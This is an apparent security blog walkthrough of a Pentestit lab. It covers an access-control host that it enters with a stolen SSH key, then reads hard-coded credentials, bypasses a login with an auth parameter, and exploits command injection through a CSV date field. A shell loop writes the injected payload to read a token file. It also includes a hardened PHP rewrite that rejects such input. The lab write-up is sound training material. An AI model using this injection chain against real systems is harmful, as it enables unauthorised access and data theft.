Innogen security

RECENT BLOG

Posted in Blog post

Pentestit lab v11 Guide Part 8

 

Site 1 Access Control

Having navigated the systems and networks, we take a look at the access control system. Using the newly obtained aengineer SSH key (adminnet.key) we are able to log in successfully:

 

root@kali:~/pentestit$ ssh -o StrictHostKeyChecking=no aengineer@172.16.0.16 -i adminnet.key
Last login: Tue Jul  4 23:07:52 2017 from 192.168.11.1
##########################
PasswordAuthentication no
##########################
aengineer@tl11-172-16-0-16:~$

BASH History:

From the bash history we note the web directory and a few useful files to check out:

 

aengineer@tl11-172-16-0-16:~$ cat .bash_history 
ls
ssh-keygen 
cd .ssh/
ls
rm id_rsa*
vi authorized_keys
cd .ssh
ls
ls -l
cd .ssh
ls
vi authorized_keys 
id
who
exit
ls -l
ls -la
cd .ssh
ls
cat authorized_keys 
vi authorized_keys 
cat authorized_keys 
w
who
finger
who
cd /var/www/html/
cat login.php 
cd /var/www/html/
cat token.sec 
cd /var/www/
ls
cd html
pwd
ls
ls -l
cat token.sec
cat login.php
cat ftpclient.py 
cat parse.php 
iptables -l

LOGIN.php file:

We cat the login.php in the /var/www/html dir and obtain the portal login credentials:

 

<?php

$usr="admin@11.lab";
$pwd="admin";

$username=$_POST['email'];
$password=$_POST['password'];

if (($username==$usr) && ($password==$pwd)) {
 header('Location: parse.php?auth=asdfgtgrfedQWERsdfd');
 }else{
 header('Location: index.html');
}

?>

 

FTPClient.py file:

We then check the contents of the FTP client file (ftpclient.py) that was shown in the bash history:

 

#!/usr/bin/python
# Pulls db.csv from the partner access control host into the web root.
from ftplib import FTP
import os
import sys

remote_filename = 'db.csv'
local_filename = '/var/www/html/db.csv'

ftp = FTP()
ftp.connect('172.16.0.17', 21, 3)            # host, port (int), timeout in seconds
ftp.login('acontrol', 'IControlEverything')  # hard-coded FTP credentials
with open(local_filename, 'w+b') as f:
    res = ftp.retrbinary('RETR ' + remote_filename, f.write)
    if not res.startswith('226 Transfer complete'):
        print('Download of file {0} is not complete.'.format(remote_filename))
        os.remove(local_filename)
ftp.quit()

What is interesting here is that it connects to the other side of the access control system (172.16.0.17) and writes the retrieved db.csv into the web root.

PARSE.php file:

parse.php compares the auth parameter against a hard-coded value, which means we do not need to log in for the given URL; we can simply pass this auth value in as a parameter:

http://172.16.0.16/parse.php?auth=asdfgtgrfedQWERsdfd

Reviewing the code, we find an exec call that converts the date field (shown in the screenshot) without any sanitisation, which potentially allows command injection:

 $converted = exec('date -d @'.$value);
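A hardened replacement for the quoted exec line, added here as an example and not part of the lab's own parse.php: the In/Out fields are validated as plain Unix timestamps and formatted with PHP's date API, so no shell is ever spawned, and rows that fail validation are reported rather than "cleaned". The row layout (Name;Surname;In;Out;ID) and the sample rows are assumed from the write-up.

```php
<?php
// Added example, not the lab's own parse.php. Assumed CSV layout from the
// write-up: Name;Surname;In;Out;ID (semicolon separated, header row first).

// Hardened form of: $converted = exec('date -d @'.$value);
// Accept only a Unix timestamp (optionally fractional) and format it with
// PHP's date API, so no process is started at all.
function convertSafe(string $value): ?string
{
    if (!preg_match('/^\d{1,12}(\.\d+)?$/', $value)) {
        return null; // anything else is rejected, not sanitised
    }
    $dt = new DateTimeImmutable('@' . (int) $value); // '@<epoch>' is always UTC
    return $dt->format('Y-m-d H:i:s');
}

// Parse db.csv rows and report which In/Out fields would have been rejected;
// the REJECTED lines double as a log signal that the CSV has been tampered with.
function parseRows(array $lines): array
{
    $header = str_getcsv(array_shift($lines), ';');
    $report = [];
    foreach ($lines as $n => $line) {
        $fields = str_getcsv($line, ';');
        if (count($fields) !== count($header)) {
            $report[] = sprintf('row %d: wrong field count, skipped', $n + 1);
            continue;
        }
        $row = array_combine($header, $fields);
        foreach (['In', 'Out'] as $field) {
            $safe = convertSafe($row[$field]);
            $report[] = $safe === null
                ? sprintf('row %d: REJECTED %s field %s', $n + 1, $field, var_export($row[$field], true))
                : sprintf('row %d: %s = %s', $n + 1, $field, $safe);
        }
    }
    return $report;
}

// Constructed sample: one benign row and the injected row from the write-up.
$sample = [
    'Name;Surname;In;Out;ID',
    'alice;smith;1497676800.0;1497712800.0;10001',
    'l33t;fraggle;1497676800.0|cat /var/www/html/token.sec > /tmp/tt.txt;1497712800.0;39514',
];
foreach (parseRows($sample) as $line) {
    echo $line, PHP_EOL;
}
```

The benign row converts on both fields; the injected row is reported as REJECTED on its In field and nothing is executed.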

Unfortunately the local db.csv file is writable by root only, so we test the connection to .17, the partner of the .16 access control system.

172.16.0.17

Once connected to .17 we open the history file again and notice db.csv in a different path:

cd /var/ftp
less /var/ftp/db.csv

We also find that the db.csv on this host is writable by aengineer.

Based on what we know about db.csv, the auth.php with creds and the exec command, we can test command execution via the date field of the db.csv file.

NOTE: I spent a good deal of time on this to get a working response; for some reason echo commands failed me, and once again a python -c 'print' command produced the results required.
Also not shown here is the fact that the results were missed during testing, as the db.csv file data is frequently repopulated with a remote copy, thus overwriting the command injection, so a while loop was needed to ensure the results are witnessed.

Route to Access Control token:

  • Open http://172.16.0.16/parse.php?auth=asdfgtgrfedQWERsdfd in a browser.
  • In the ssh session on the .17 access control server execute the following:
    while true; do python -c 'print "Name;Surname;In;Out;ID\nl33t;fraggle;1497676800.0|cat /var/www/html/token.sec > /tmp/tt.txt;1497712800.0;39514"' > db.csv; sleep 3; done
  • Refresh the browser until we see our result.
  • On the .16 server we cat /tmp/tt.txt to view the token.

 

Conclusion:

This was a fantastic lab and reminded me of a few hosts within the OSCP labs, as mentioned during this writeup, and the fact that pentestit offer this for free is amazing and truly offers pentesters/CTF hobbyists fun and challenges based on real-world scenarios; I will be eagerly awaiting the next set of labs.

I have to thank Roman Romanov for creating this amazing site and Luka Safanov for quickly responding to the rare requirement of resetting a host or two via Telegram after access issues (normally down to a user changing the password...).
